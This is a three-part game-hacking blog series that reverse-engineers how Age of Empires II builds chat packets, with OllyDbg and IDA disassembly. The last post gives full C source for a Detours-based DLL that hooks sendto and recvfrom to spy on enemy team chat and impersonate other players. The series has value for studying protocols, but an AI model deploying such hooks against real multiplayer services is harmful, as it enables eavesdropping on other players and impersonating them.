RCE Endeavors 😅

July 23, 2011

Messing with Protocols: Applications (3/3)

Filed under: Game Hacking,Reverse Engineering — admin @ 2:47 AM

This will be the concluding post of the “Messing with Protocols” series. It will contain some discussion of what was learned and how to mess with the game a bit as a result. The source code provided can be expanded to send any custom chat packets or be used as a starting point in developing a fuzzer. Since the game does not perform integrity checks on parts of the packet such as a valid timer value (this wasn’t discussed but was found while I was reversing recvfrom and onwards), packets can easily be forged by grabbing the session key from any packet. The only field checked is the DWORD value of 06 00 00 00 which was shown to be written in during the building of the chat packet. This means that a custom chat packet can be sent without having to go through the hassle of having to hook the function that increases and writes the timer into the packet (to get the appropriate value if there was a check). This means that writing a custom packet sender is quite easy. The steps would just be: hook sendto to grab the session key and build the packet placing the session key and the 06 00 00 00 bytes in the appropriate offsets. After that, the packet can be filled with whatever data — either garbage data in the case of a fuzzer, or the structure of a legitimate chat packet.
Below is the source to a sample program that can read other players team chat as well as pose as a different player.

#pragma comment(lib, "detours.lib")
#pragma comment(lib, "Ws2_32.lib")
 
#include <Windows.h>
#include <stdio.h>
#include <include/detours.h>
 
#define PLAYER_INDEX 20
#define CHAT_FLAG_INDEX 21
#define CHAT_BROADCAST_INDEX 22
#define CHAT_MESSAGE_START_INDEX 37
 
#define CHAT_FLAG 0xDC
 
static int (WINAPI *psendto)(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen) = sendto;
static int (WINAPI *precvfrom)(SOCKET s, char *buf, int len, int flags, struct sockaddr *from, int *fromlen) = recvfrom;
 
char *ghost_command = NULL;
char *new_packet_out = NULL;
char *ghost_key = "@ghost";
char *spy_key_on = "@spyon";
char *spy_key_off = "@spyoff";
 
unsigned char player_to_ghost = 0xFF;
bool is_spy_on = false;
 
int WINAPI recvfrom_hook(SOCKET s, char *buf, int len, int flags, struct sockaddr *from, int *fromlen) {
    __asm pushad
    if((buf[CHAT_FLAG_INDEX] & 0xFF) == CHAT_FLAG && is_spy_on == true) {
        memset((buf + CHAT_BROADCAST_INDEX), 0x59, 8);
    }
    int ret = precvfrom(s, buf, len, flags, from, fromlen);
    __asm popad
    return ret;
}
 
int WINAPI sendto_hook(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen) {
    __asm pushad
    memcpy(new_packet_out, buf, len);
    if((new_packet_out[CHAT_FLAG_INDEX] & 0xFF) == CHAT_FLAG) {
        if((ghost_command = strstr((new_packet_out + CHAT_MESSAGE_START_INDEX), ghost_key)) != NULL) {
            player_to_ghost = (ghost_command[strlen(ghost_key)] - 0x30) & 0xFF;
            memset((new_packet_out + CHAT_BROADCAST_INDEX), 0x4E, 8);
        }
        if(strstr((new_packet_out + CHAT_MESSAGE_START_INDEX), spy_key_on) != NULL) {
            is_spy_on = true;
            memset((new_packet_out + CHAT_BROADCAST_INDEX), 0x4E, 8);
        }
        else if(strstr((new_packet_out + CHAT_MESSAGE_START_INDEX), spy_key_off) != NULL) {
            is_spy_on = false;
            memset((new_packet_out + CHAT_BROADCAST_INDEX), 0x4E, 8);
        }
        if(player_to_ghost == 0x00 || player_to_ghost > 0x8)
            new_packet_out[PLAYER_INDEX] = 0xF;
        else
        {
            new_packet_out[PLAYER_INDEX] = player_to_ghost;
            new_packet_out[CHAT_BROADCAST_INDEX + (player_to_ghost - 1)] = 0x4E;
        }
    }
    int ret = psendto(s, new_packet_out, len, flags, to, tolen);
    __asm popad
    return ret;
}
 
int APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved){
    if(reason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hModule);
        new_packet_out = (char *)malloc(256 * sizeof(char));
        (void)DetourTransactionBegin();
        (void)DetourUpdateThread(GetCurrentThread());
        (void)DetourAttach(&(PVOID&)psendto, sendto_hook);
        (void)DetourAttach(&(PVOID&)precvfrom, recvfrom_hook);
        (void)DetourTransactionCommit();
    }
    return TRUE;
}

The sample takes in three commands provided through chat, @ghost to imitate a player, @spy_on to enable the ability enemy team chat, and @spy_off to disable it. These all work by replacing outgoing or incoming packets. Chat ghosting works through changing the index of the player sending the chat in outgoing packets. The chat spying works by setting the flags on incoming packets to display in the client. The usage is shown below:
The chat from the impersonators perspective, who is impersonating player 3.

The chat visible to other players.

After doing all of the reversing, I actually stumbled across a great article which explains the networking code behind the Age of Empire series and provides exclamations into what the counters mean and the general architecture of the protocol.

A downloadble PDF of this post can be found here.

June 1, 2011

Messing with Protocols: Reverse Engineering (2/3)

Filed under: Game Hacking,Reverse Engineering — admin @ 7:55 PM

Some prerequisite words: The networking code is aggressively optimized and this post will be extremely difficult to comprehend without decent knowledge of assembly and following along in a debugger. Below is my analysis of how a chat packet is constructed within the game, which was analyzed on a running instance with OllyDbg. Also, the knowledge contained in post isn’t necessarily needed for being able to forge packets across an established in-game connection.

The process begins by trying to find out where the game grabs the chat from. Logically, to build a chat packet, there needs to be some chat. This should either be the starting point or near to the starting point of building the chat packet to send. Techniques on finding out this starting point are situational. For example, if the chat were entered directly from some input box, it might be wise to breakpoint calls to GetDlgItemText or something similar and follow from there. For this, I chose the approach of setting a breakpoint on sendto and following the call stack backwards. The packet can be fully inspected on the call to sendto as shown below:

As an aside, this is also a good place to test for things like data checksums or even possible exploits in the protocol. Checking for data checksums is pretty easy — if one of those unknown fields in the packet is a checksum, then modifying the data but keeping the checksum the same will make the receiving client report an error and/or not display the chat. Since it was possible to modify the text and still have it appear on the other side, you can conclude that no data checksum is present (or the receiving code doesn’t check it). Additionally, modifying the length of the chat also allows the chat to get through. This is more interesting because there actually is a checksum on the length appended to the packets. Having looked over the recvfrom code, which won’t be discussed in this post, I will just say that the checksum is not checked by the game. There are other things to check for like overflows which can be invoked by setting the chat length to 0xFF and sending chat greater than 0xFF in size to see if the game parses the packet correctly or not. Overall, I didn’t find anything too interesting that didn’t solely cause my own instance (the one sending the packets) of the game to crash.
Back on topic however, the call stack at sendto is shown below:

The goal is to find out where the packet is built, so the best place to look is the furthest back. Checking DPLAYX.6E2E6333 reveals the following data at [ESP+14]:

which shows a chat packet containing the header. This means that it is necessary to check even further back. The next step is to look at the call from DPLAYX.6E2DCBBA. The call is shown below:

6E2DCBAC   6A 01            PUSH 1
6E2DCBAE   57               PUSH EDI
6E2DCBAF   53               PUSH EBX
6E2DCBB0   FF75 14          PUSH DWORD PTR SS:[EBP+14]
6E2DCBB3   FF75 F8          PUSH DWORD PTR SS:[EBP-8]
6E2DCBB6   FF75 1C          PUSH DWORD PTR SS:[EBP+1C]
6E2DCBB9   50               PUSH EAX
6E2DCBBA   E8 74970000      CALL DPLAYX.6E2E6333

Setting a breakpoint on this shows that the fully built packet is stored in EBX. Tracing backwards up the function, the chat is loaded into EBX by

6E2DCB1E   8B5D 18          MOV EBX,DWORD PTR SS:[EBP+18]

which means it’s necessary to go even further backwards since the packet is still fully built at this point. OllyDbg isn’t too great at keeping track of call stacks when the function isn’t called directly. Setting a breakpoint at the top of the function and checking the call stack showed that nothing called it, which definitely is not correct. The easiest approach is to inspect the stack manually for the point of return. When EBP is set up, the stack looks like the following:

That address leads to the following function, with the call at 0x005D356D:

005D3540  /$ 8B91 10470000  MOV EDX,DWORD PTR DS:[ECX+4710]
005D3546  |. 33C0           XOR EAX,EAX
005D3548  |. 85D2           TEST EDX,EDX
005D354A  |. 75 24          JNZ SHORT aoc1_-_C.005D3570
005D354C  |. 8B5424 14      MOV EDX,DWORD PTR SS:[ESP+14]
005D3550  |. A1 84027900    MOV EAX,DWORD PTR DS:[790284]
005D3555  |. 52             PUSH EDX
005D3556  |. 8B5424 14      MOV EDX,DWORD PTR SS:[ESP+14]
005D355A  |. 52             PUSH EDX
005D355B  |. 8B5424 14      MOV EDX,DWORD PTR SS:[ESP+14]
005D355F  |. 8B08           MOV ECX,DWORD PTR DS:[EAX]
005D3561  |. 52             PUSH EDX
005D3562  |. 8B5424 14      MOV EDX,DWORD PTR SS:[ESP+14]
005D3566  |. 52             PUSH EDX
005D3567  |. 8B5424 14      MOV EDX,DWORD PTR SS:[ESP+14]
005D356B  |. 52             PUSH EDX
005D356C  |. 50             PUSH EAX
005D356D  |. FF51 68        CALL DWORD PTR DS:[ECX+68]
005D3570     C2 1400        RETN 14

This is beginning to lead in the right direction since the call is made directly from the game instead of an additional library. Additionally, this function is only called when chat is to be sent. All other ones prior to this were called when any packet was to be sent. The chat is loaded into EDX at the following instruction:

005D355A  |. 52             PUSH EDX

The packet is still fully built at this point, but the search is almost over. The problem and approach are still the same, but now its been heavily isolated. The call stack from this point should contain functions that deal with collecting data and constructing the appropriate packet, instead of networking functions in the DirectPlay and Winsock libraries. Taking the same approach as before and setting a breakpoint at the top of the function shows the following call stack:

Looking at 0x005DC6720, one of the further functions down the call stack, begins to show some promise. When this function is entered, the chat string is held in the EAX register. It can be modified and the changes carry on through to the sendto function. This means that it’s not a function working on a temporary copy of the buffer, but that it holds the “real” one that will be written into the chat packet. This seems like a good starting point since there is no sign of any packet header being built. Additionally, inspecting the other functions up the call stack from 0x005DC720 shows that some of them display debug messages dealing with packets and chat headers. This is also a good sign that the real reversing should begin here.

What I personally prefer doing is following the code flow in OllyDbg then highlighting the executed code path in IDA Pro. The assembly listings from IDA will be shown in the code blocks to follow. The function starts at 0x005D6720:

.text:005D6720 ; int __stdcall send_normal(char *Str)
.text:005D6720 send_normal     proc near               ; CODE XREF: sub_4FD360+BDFp
.text:005D6720                                         ; sub_5A6C90+154p ...
.text:005D6720
.text:005D6720 broadcast       = dword ptr -0Ch
.text:005D6720 var_8           = dword ptr -8
.text:005D6720 var_4           = word ptr -4
.text:005D6720 Str             = dword ptr  4
.text:005D6720
.text:005D6720                 sub     esp, 0Ch
.text:005D6723                 mov     eax, 59595959h
.text:005D6728                 push    esi
.text:005D6729                 mov     [esp+10h+broadcast], eax
.text:005D672D                 mov     esi, ecx
.text:005D672F                 mov     [esp+10h+var_8], eax
.text:005D6733                 mov     [esp+10h+var_4], ax
.text:005D6738                 mov     eax, [esi+10E4h] ; number of other players in game
.text:005D673E                 test    eax, eax
.text:005D6740                 jnz     short loc_5D6780

The first thing to notice is that no stack frame is set up. This is the beginning of a lot of incoming optimized code. Everything function to come will not set up a stack frame and will work directly relative to ESP. The next thing to notice is that the value 0x59595959 is moved into EAX, which is then moved into [ESP+0x4]. Why 0x59595959? Looking back at the previous example packets, there were eight bytes devoted to who can see the packet. These were set to either Y or N depending on whether the target player is supposed to display the message or not. 0x59 happens to be the ASCII code for ‘Y’, so the beginning of this function sets up to send a message to all players, i.e. the broadcast field in the packet will be YYYYYYYY (or 0x59 0x59 … 0x59). [ESI+0x10E4] holds the number of other players in the game. This is moved into EAX and checked for zero. Assuming there is at least one additional player, the code jumps to 0x005D6780. The case where no other player is in game won’t be discussed in-depth except that in that case no packets are sent and the text is only displayed on the screen. Continuing on at 0x005D6780 is the following block:

.text:005D6780 loc_5D6780:                             ; CODE XREF: send_normal+20j
.text:005D6780                 mov     eax, [esp+14h]
.text:005D6784                 mov     edx, [esi+10E0h]
.text:005D678A                 lea     ecx, [esp+10h+broadcast]
.text:005D678E                 push    eax             ; chat string
.text:005D678F                 push    ecx             ; broadcast audience
.text:005D6790                 push    edx             ; player_index
.text:005D6791                 mov     ecx, esi
.text:005D6793                 call    sub_5D67A0
.text:005D6798                 pop     esi
.text:005D6799                 add     esp, 0Ch
.text:005D679C                 retn    4
.text:005D679C send_normal     endp

Looking at this is just a matter of stepping over in OllyDbg. The function at 0x005D67A0 is called with the player index, the broadcast audience, and the chat message as parameters. This function is a bit longer and more complicated. The first block is shown below:

.text:005D67A0 ; int __stdcall sub_5D67A0(int player_index, int chat_message, char *Str)
.text:005D67A0 sub_5D67A0      proc near               ; CODE XREF: .text:004A8961p
.text:005D67A0                                         ; sub_4A8970+5Bp ...
.text:005D67A0
.text:005D67A0 var_114         = byte ptr -114h
.text:005D67A0 var_113         = byte ptr -113h
.text:005D67A0 chat_length     = dword ptr -108h
.text:005D67A0 var_104         = byte ptr -104h
.text:005D67A0 Dest            = byte ptr -103h
.text:005D67A0 var_4           = byte ptr -4
.text:005D67A0 player_index    = dword ptr  4
.text:005D67A0 chat_message    = dword ptr  8
.text:005D67A0 Str             = dword ptr  0Ch
.text:005D67A0
.text:005D67A0                 sub     esp, 114h
.text:005D67A6                 xor     eax, eax
.text:005D67A8                 push    ebx
.text:005D67A9                 push    ebp
.text:005D67AA                 mov     ebp, ecx
.text:005D67AC                 push    esi
.text:005D67AD                 mov     ecx, [esp+120h+player_index]
.text:005D67B4                 push    edi
.text:005D67B5                 mov     ax, [ebp+12DCh] ; maximum number of players
.text:005D67BC                 cmp     ecx, eax
.text:005D67BE                 jbe     short loc_5D67D2

This code will be tricky to go through because things will be referenced through EBP and ESP. The important immediate thing to note is that EBP takes the value of ECX, which had ESI moved into it prior to the function call. As usual, no stack frame is set up. All that this code does is compare the index of the player sending the chat (stored in [EBP+0x12DC]) with the maximum number of players allowed in the game. The error condition is that the player index is greater than the maximum number allowed (e.g. player 9 is trying to send a message in an 8 player game). Assuming no error, the jump to 0x005D67D2 is taken. This is a pretty small block which performs an unusual check:

.text:005D67D2 loc_5D67D2:                             ; CODE XREF: sub_5D67A0+1Ej
.text:005D67D2                 mov     ebx, [esp+124h+Str]
.text:005D67D9                 push    ebx             ; Str
.text:005D67DA                 call    _atoi
.text:005D67DF                 mov     esi, 1
.text:005D67E4                 add     esp, 4
.text:005D67E7                 cmp     [ebp+12DCh], si ; [ebp+12DCh] holds number of players
.text:005D67EE                 mov     edi, eax
.text:005D67F0                 jb      loc_5D6883

The purpose of the call to atoi is to check whether a taunt has been entered. Taunts are represented in chat purely by numbers, so atoi will return non-zero if that is the case. The code then continues to check whether more than one player is in the game. This is to determine whether it’s necessary to build a packet or not. Assuming more than one player is in the game, the jump to 0x005D6883 is not taken. A loop is then entered. The important parts of the loop are reproduced below. These are the instructions that are executed when more than one player is to receive some chat.

.text:005D67F6 loc_5D67F6:                             ; CODE XREF: sub_5D67A0+DDj
.text:005D67F6                 push    esi             ; begin loop to see who is allowed to see message
.text:005D67F7                 mov     ecx, ebp
.text:005D67F9                 call    can_player_see
.text:005D67FE                 test    eax, eax
.text:005D6800                 jnz     short loc_5D680E ; player allowed to see message
.text:005D6802                 push    esi             ; player number
.text:005D6803                 mov     ecx, ebp
.text:005D6805                 call    sub_5D9720
.text:005D680A                 test    eax, eax
.text:005D680C                 jz      short loc_5D686C
.text:005D680E
.text:005D680E loc_5D680E:                             ; CODE XREF: sub_5D67A0+60j
.text:005D680E                 mov     ecx, [esp+124h+chat_message] ; player allowed to see message
.text:005D6815                 cmp     byte ptr [esi+ecx], 59h
.text:005D6819                 jnz     short loc_5D686C
.text:005D681B                 mov     edx, dword_7912A0 ; jump not taken, player allowed to see message
.text:005D6821                 mov     [esp+esi+124h+var_113], 59h ; allowed flag
.text:005D6826                 mov     eax, [edx+424h]
.text:005D682C                 test    eax, eax
.text:005D682E                 jz      short loc_5D6871
.text:005D6871
.text:005D6871 loc_5D6871:                             ; CODE XREF: sub_5D67A0+8Ej
.text:005D6871                                         ; sub_5D67A0+98j ...
.text:005D6871                 xor     eax, eax
.text:005D6873                 inc     esi             ; see if next player is allowed to see message
.text:005D6874                 mov     ax, [ebp+12DCh] ; maximum number of players in game
.text:005D687B                 cmp     esi, eax
.text:005D687D                 jbe     loc_5D67F6      ; begin loop to see who is allowed to see message
.text:005D6883
.text:005D6883 loc_5D6883:                             ; CODE XREF: sub_5D67A0+50j
.text:005D6883                 mov     eax, [ebp+10E4h] ; total number of players in game
.text:005D6889                 test    eax, eax
.text:005D688B                 jnz     loc_5D6915

The can_player_see function at 0x005D96E0 just returns 1 or 0 depending on whether the player can see the message. What this loop basically does is decide who is going to see this message. The YYY…Y buffer that was passed in to this function gets modified here according to which player can see the message. The following two instructions set the appropriate byte:

.text:005D6821                 mov     [esp+esi+124h+var_113], 59h ; allowed flag

or

.text:005D686C                 mov     [esp+esi+124h+var_113], 4Eh ; not allowed flag

The loop continues for eight iterations, the maximum number of players in the game. Once this loop is done, the part of the packet which will hold who can see the message is ready. Once the loop exits, the following code blocks are executed:

.text:005D6883 loc_5D6883:                             ; CODE XREF: sub_5D67A0+50j
.text:005D6883                 mov     eax, [ebp+10E4h] ; total number of players in game
.text:005D6889                 test    eax, eax
.text:005D688B                 jnz     loc_5D6915
.text:005D6915 ; ---------------------------------------------------------------------------
.text:005D6915
.text:005D6915 loc_5D6915:                             ; CODE XREF: sub_5D67A0+EBj
.text:005D6915                                         ; sub_5D67A0+164j
.text:005D6915                 mov     ecx, [ebp+10E0h]
.text:005D691B                 cmp     [esp+ecx+124h+var_113], 59h
.text:005D6920                 jnz     short loc_5D6957 ; EDI holds chat string
.text:005D6922                 mov     eax, [esp+124h+player_index]
.text:005D6929                 mov     edx, [ebp+12CCh] ; username sending chat
.text:005D692F                 mov     ecx, [ebp+18h]
.text:005D6932                 push    0
.text:005D6934                 push    0
.text:005D6936                 push    eax
.text:005D6937                 shl     eax, 7
.text:005D693A                 add     edx, eax        ; EDX holds username
.text:005D693C                 push    ebx             ; EBX holds chat
.text:005D693D                 push    edx
.text:005D693E                 call    sub_5E2780
.text:005D6943                 mov     eax, dword_78BF34
.text:005D6948                 push    ebx
.text:005D6949                 push    offset aLocalChatAddS ; "Local chat add: %s"
.text:005D694E                 push    eax
.text:005D694F                 call    nullsub_1       ; debug function?
.text:005D6954                 add     esp, 0Ch
.text:005D6957
.text:005D6957 loc_5D6957:                             ; CODE XREF: sub_5D67A0+180j
.text:005D6957                 mov     edi, ebx        ; EDI holds chat string
.text:005D6959                 or      ecx, 0FFFFFFFFh
.text:005D695C                 xor     eax, eax
.text:005D695E                 repne scasb             ; Calculates length of string
.text:005D6960                 not     ecx
.text:005D6962                 dec     ecx             ; ECX holds number of characters
.text:005D6963                 cmp     ecx, 0FFh
.text:005D6969                 jbe     short loc_5D6972 ; Calculates length of string again

There isn’t anything too special about this block. There is a call to 0x005E2780, which is a huge and complicated function. Fortunately, it doesn’t do anything related to modifying the chat or building a packet — so it doesn’t have to be analyzed. Other than that there is nothing going on except for calculating the length of the string. This is compared against 0xFF, which is the maximum number of characters allowed. Normal execution continues into the following blocks:

.text:005D6972 ; ---------------------------------------------------------------------------
.text:005D6972
.text:005D6972 loc_5D6972:                             ; CODE XREF: sub_5D67A0+1C9j
.text:005D6972                 mov     edi, ebx        ; Calculates length of string again
.text:005D6974                 or      ecx, 0FFFFFFFFh
.text:005D6977                 xor     eax, eax
.text:005D6979                 repne scasb
.text:005D697B                 not     ecx
.text:005D697D                 dec     ecx
.text:005D697E
.text:005D697E loc_5D697E:                             ; CODE XREF: sub_5D67A0+1D0j
.text:005D697E                 mov     dl, byte ptr [esp+124h+player_index]
.text:005D6985                 mov     [esp+124h+chat_length], ecx ; Chat length added to buffer
.text:005D6989                 inc     ecx
.text:005D698A                 lea     eax, [esp+124h+Dest]
.text:005D698E                 push    ecx             ; Count
.text:005D698F                 push    ebx             ; Source
.text:005D6990                 push    eax             ; Dest
.text:005D6991                 mov     [esp+130h+var_114], dl ; Player number who sent message
.text:005D6995                 call    _strncpy
.text:005D699A                 mov     ecx, [ebp+1E3Ch] ; 3?
.text:005D69A0                 mov     edx, [esp+130h+chat_length]
.text:005D69A4                 add     esp, 0Ch
.text:005D69A7                 cmp     ecx, 3
.text:005D69AA                 setz    cl              ; CL = 1
.text:005D69AD                 add     edx, 16h
.text:005D69B0                 push    0
.text:005D69B2                 lea     eax, [esp+128h+var_114]
.text:005D69B6                 push    edx             ; Chat length + 0x16
.text:005D69B7                 push    eax             ; Partial packet. Contains chat flag, chat length, who is allowed to see, and message
.text:005D69B8                 mov     [esp+130h+var_104], cl
.text:005D69BC                 push    43h
.text:005D69BE                 push    0
.text:005D69C0                 mov     ecx, ebp
.text:005D69C2                 mov     [esp+138h+var_4], 0
.text:005D69CA                 call    sub_5D7BC0
.text:005D69CF                 mov     ecx, [ebp+1608h]
.text:005D69D5                 mov     esi, eax
.text:005D69D7                 push    offset aTxchat  ; "TXChat()"
.text:005D69DC                 push    esi
.text:005D69DD                 call    sub_5DF900
.text:005D69E2                 mov     eax, esi
.text:005D69E4                 pop     edi
.text:005D69E5                 pop     esi
.text:005D69E6                 pop     ebp
.text:005D69E7                 pop     ebx
.text:005D69E8                 add     esp, 114h
.text:005D69EE                 retn    0Ch
.text:005D69EE sub_5D67A0      endp

Prior to entering this code block the packet buffer contains only who is allowed to see the message. The actual packet buffer is stored relative to ESP and the data will be written directly there. There are some parts that are difficult to analyze like magic values appearing out of nowhere, i.e., [EBP+0x1E3C] holding the value of 3. These don’t affect understanding the code too much unless they play some vital role in how the actual packet will be built (the value is a flag parameter for a function, etc.). With the code above, the the CL register is set to 1 since 3 == 3, and is written into the packet buffer. Fortunately, one beneficial thing about this optimized code is that it’s easy to see where the packet is being built. The writes into [ESP+xx]  hold the buffer for the packet, which can be verified by inspecting it in the dump with OllyDbg. Checking all places where this occurs and seeing what is being written, the packet will have the following fields before entering the function at 0x005D7BC0: A field set to 0x1 (the CL value being written in), who is allowed to see the chat, the chat message itself, and an additional special value 0xDC. This value is always found in the same field and always has the same value. A view of the packet from the dump is shown below:

The call to 0x005D7BC0 will add the remaining fields of the packet (the two supposed counter values, and fields marked as unknown in the first post). Since this function is pretty big, I won’t duplicate the entire thing here, but only relevant parts — this post is meant to be followed along with in a disassembler after all. This function allocates a new block of memory and returns the entire packet to send (excluding the fields added by DirectPlay’s networking code). The “second counter” bytes are written in by the instructions listed below:

.text:005D7C1A loc_5D7C1A:                             ; CODE XREF: sub_5D7BC0+39j
.text:005D7C1A                 push    0Ch             ; unsigned int
.text:005D7C1C                 call    ??2@YAPAXI@Z    ; operator new(uint)
.text:005D7C21                 mov     edx, [esp+34h+arg_C]
.text:005D7C25                 mov     ecx, [ebp+4714h] ;time stamp
.text:005D7C2B                 mov     edi, eax
.text:005D7C2D                 mov     al, [ebp+1DD0h] ; 1
.text:005D7C33                 add     esp, 4
.text:005D7C36                 add     ecx, edx
.text:005D7C38                 test    al, al
.text:005D7C3A                 mov     [esp+30h+Memory], edi
.text:005D7C3E                 mov     [ebp+4714h], ecx ; 0x51E
.text:005D7C44                 jz      short loc_5D7C7A
.text:005D7C46                 mov     ecx, [ebp+1DA0h] ; Retrieve second counter
.text:005D7C4C                 mov     [edi+8], ecx    ; Write value into packet
.text:005D7C4F                 mov     eax, [ebp+10E0h] ; player position
.text:005D7C55                 mov     ecx, [ebp+1DA0h] ; second counter value
.text:005D7C5B                 mov     [ebp+eax*4+1DE4h], ecx
.text:005D7C62                 mov     eax, [ebp+1DA0h] ; Get second counter value
.text:005D7C68                 inc     eax             ; Increment it for next packet
.text:005D7C69                 mov     [ebp+1DA0h], eax ; Write new value back in
.text:005D7C6F                 mov     eax, 0Ch
.text:005D7C74                 mov     [esp+30h+var_20], eax
.text:005D7C78                 jmp     short loc_5D7C89
.text:005D7C89
.text:005D7C89 loc_5D7C89:                             ; CODE XREF: sub_5D7BC0+B8j
.text:005D7C89                 lea     ecx, [eax+edx]  ; size of header + data
.text:005D7C8C                 cmp     ecx, 0FA0h      ; maximum packet size
.text:005D7C92                 mov     [esp+30h+var_1C], ecx ; write in full size
.text:005D7C96                 jbe     short loc_5D7CB3

Again there are some magic values that seemingly appear out of nowhere. There are some more familiar ones like [EBP+0x10E0], which was shown in previous functions as storing the player index. The value of the counter is kept at [EBP+0x1DA0], which is written into the packet through EDI. The timestamp bytes are also written in, which are apparently kept at [EBP+0x4714]. The code in the second block just grabs the counter, writes it to the packet buffer, and increments it for the next time it is used. The next block writes in the size of the packet so far. This will be a check to make sure that the header and data do not exceed the maximum length allowed for a chat packet. The next field is an unknown field that is written by:

.text:005D7CB3
.text:005D7CB3 loc_5D7CB3:                             ; CODE XREF: sub_5D7BC0+D6j
.text:005D7CB3                 xor     eax, eax
.text:005D7CB5                 mov     byte ptr [edi+1], 0
.text:005D7CB9                 mov     byte ptr [edi], 0
.text:005D7CBC                 mov     al, [ebp+1E74h] ; Number of players
.text:005D7CC2                 mov     ecx, [ebp+10C8h] ; 2?
.text:005D7CC8                 lea     ebx, [ebp+1DA8h] ; 4?
.text:005D7CCE                 add     eax, ecx
.text:005D7CD0                 mov     [esp+30h+var_14], eax
.text:005D7CD4                 mov     [edi+4], eax    ; 06 00 00 00 added here

This writes in 06 00 00 00 to the packet, which comes from adding [EBP+0x10C8] and [EBP+0x1DA8] together. Where these two things come from, I’m not entirely quite sure. However, they remain constant across all packets regardless of size, player index, and so on, so it’s not too important for being able to forge packets. The other counter value can be found at

.text:005D7D22                 mov     ecx, [esp+30h+var_14] ; Full packet size
.text:005D7D26                 push    ecx
.text:005D7D27                 mov     ecx, ebp
.text:005D7D29                 call    sub_5D7B50
.text:005D7D2E                 mov     [edi+1], al     ; Counter value
.text:005D7D31                 mov     ecx, [ebp+1E3Ch] ; 3?
.text:005D7D37                 cmp     ecx, 5
.text:005D7D3A                 jz      short loc_5D7D6C
.text:005D7D3C                 test    al, al
.text:005D7D3E                 jnz     short loc_5D7D6C

in the call to 0x005D7B50, which returns the counter byte. This can be seen here

.text:005D7B6F ; ---------------------------------------------------------------------------
.text:005D7B6F
.text:005D7B6F loc_5D7B6F:                             ; CODE XREF: sub_5D7B50+Cj
.text:005D7B6F                 mov     al, byte ptr dword_790FAC ; Get counter byte
.text:005D7B74                 inc     al              ; Increment counter byte
.text:005D7B76                 cmp     al, 0FFh        ; Compare with max allowed
.text:005D7B78                 mov     byte ptr dword_790FAC, al ; Write value back
.text:005D7B7D                 jb      short loc_5D7BA3

which just gets the byte, increments it, and resets it if it’s greater than 0xFF. The last important block of code is shown below:

.text:005D7D6C
.text:005D7D6C loc_5D7D6C:                             ; CODE XREF: sub_5D7BC0+17Aj
.text:005D7D6C                                         ; sub_5D7BC0+17Ej
.text:005D7D6C                 mov     eax, [esp+30h+var_1C] ; Full packet size
.text:005D7D70                 mov     [edi], bl       ; Packet type 60
.text:005D7D72                 inc     eax
.text:005D7D73                 push    eax             ; unsigned int
.text:005D7D74                 call    ??2@YAPAXI@Z    ; operator new(uint)
.text:005D7D79                 mov     ebx, eax        ; Buffer size of the packet header + data
.text:005D7D7B                 mov     eax, [esp+34h+var_20] ; 0xC?
.text:005D7D7F                 mov     ecx, eax
.text:005D7D81                 mov     esi, edi
.text:005D7D83                 mov     edx, ecx
.text:005D7D85                 mov     edi, ebx
.text:005D7D87                 shr     ecx, 2
.text:005D7D8A                 rep movsd               ; Packet minus session key is written here
.text:005D7D8C                 mov     ecx, edx
.text:005D7D8E                 add     esp, 4
.text:005D7D91                 and     ecx, 3
.text:005D7D94                 mov     [esp+30h+var_10], ebx
.text:005D7D98                 rep movsb
.text:005D7D9A                 mov     ecx, [esp+30h+arg_C]
.text:005D7D9E                 test    ecx, ecx
.text:005D7DA0                 jz      short loc_5D7DB7

Prior to entering this block, the packet is fully built. This is responsible for creating the buffer for the full packet to send and copying the contents in there. There’s not much more to it at this point. Looking down the function, it will call into another function which in turn calls into DirectPlay (seen earlier in this post).
The entire explanation has basically been following across the call stack and seeing how the chat input is transformed from it’s initial stage into a fully built packet. The specific knowledge gained may not have been too great — there are still those unknown fields — however, it was useful to see that there are special checksums or integrity checks performed on the data which will go in to the packet. Also, it was possible to learn how those counters in the packet function, how their values change, and if their values have any effect on how data will be transmitted. I don’t expect this explanation to be incredibly clear since it was written over a period of a few days, but these are some notes that I wanted to publish online both for my records and as a demonstration of how difficult and confusing it can be to even reverse one specific type of packet in a protocol. Unfortunately, the code is extremely optimized so this post may not serve as a great starting point into reversing protocols altogether, but the general idea should be the same of finding out where and how certain input is transformed into a transmittable packet.

A downloadable PDF of this post can be found here.

May 27, 2011

Messing with Protocols: Preliminary (1/3)

Filed under: Game Hacking,Reverse Engineering — admin @ 3:01 PM

This next series of posts will focus on looking at a game’s protocol. Specifically, the packet structure and some basic steps into the world of packet reversing. I will focus on explaining how a specific packet (a chat packet) is built in-game and how understanding the packet structure can let someone do some fun and unexpected things. It should be noted that this won’t be an article in server emulation as that is much too complex and time consuming to both perform and write about. The steps and methodologies discussed though can aid in beginning to fully reverse a protocol and begin a project in server emulation. This whole series will be broken down into three parts:

  • A preliminary post (this one) discussing how to perform a high level inspection of a protocol.
  • Reverse engineering the target application to see where and how a specific packet is built.
  • Example programs that could be written to send your own packets or modify parts of incoming/outgoing packets.

To start off, the target will be Age of Empires II: The Conquerors Expansion. This was chosen because the chat packets of the protocol are unencrypted so there won’t be any large sidetrack about hunting down encryption keys or reversing algorithms. There are other factors like the game being dead (developing studio disbanded), and it being one of the few multiplayer games that I own. That said, it’s time for some analysis. One of the better tools for this job is WPE Pro. It’s extremely easy to use and provides a simple interface that displays everything that is needed. To get started, I created a LAN game with myself and used WPE to log packets on one instance. Below is an example of some chat packets that were sent. These can be analyzed for patterns and guesses at the different parts of it can be taken and later verified or discarded. The hex dump of the packets is shown below, with the sent chat in blue and the changes between the packets highlighted in red:
D8 26 D9 16 00 00 00 00 43 17 00 00 06 00 00 00 E7 07 00 00 01 DC 59 59 4E 4E 4E 4E 4E 4E 32 00 01 00 00 00 01 41 00 00 24 DC 18
D8 26 D9 16 00 00 00 00 43 18 23 02 06 00 00 00 E8 07 00 00 01 DC 59 59 4E 4E 4E 4E 4E 4E 32 00 02 00 00 00 01 41 41 00 24 DC 18 00
D8 26 D9 16 00 00 00 00 43 19 18 00 06 00 00 00 E9 07 00 00 01 DC 59 59 4E 4E 4E 4E 4E 4E 32 00 03 00 00 00 01 41 41 41 00 DC 18 00 80
